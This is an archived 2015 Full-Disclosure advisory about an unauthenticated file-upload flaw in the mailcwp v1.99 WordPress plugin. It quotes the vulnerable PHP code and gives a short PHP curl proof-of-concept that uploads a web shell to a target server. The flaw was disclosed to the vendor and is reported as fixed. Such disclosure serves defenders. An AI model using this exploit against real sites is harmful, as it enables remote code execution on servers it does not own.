lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 16 Jul 2015 20:18:11 -0400
From: "Larry W. Cashdollar" <>
To: Open Source Security <>
Subject: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress

Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site:
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.
The code in mailcwp-upload.php  doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server:

  2 $message_id = $_REQUEST["message_id"];
  3 $upload_dir = $_REQUEST["upload_dir"];
  8 $fileName = $_FILES["file"]["name"];
  9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");

Exploitation requires the attacker to guess a writeable location in the http server root.

Exploit Code:
	• <?php
	• /*Larry W. Cashdollar @_larry0
	• Exploit for mailcwp v1.99 shell will be called 1-shell.php.
	• 7/9/2015
	• */
	•         $target_url = '';
	•         $file_name_with_full_path = '/var/www/shell.php';
	•         echo "POST to $target_url $file_name_with_full_path";
	•         $post = array('file' => 'shell.php','file'=>'@...file_name_with_full_path);
	•         $ch = curl_init();
	•         curl_setopt($ch, CURLOPT_URL,$target_url);
	•         curl_setopt($ch, CURLOPT_POST,1);
	•         curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
	•         curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
	•         $result=curl_exec ($ch);
	•         curl_close ($ch);
	•         echo "<hr>";
	•         echo $result;
	•         echo "<hr>";
	• ?>

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists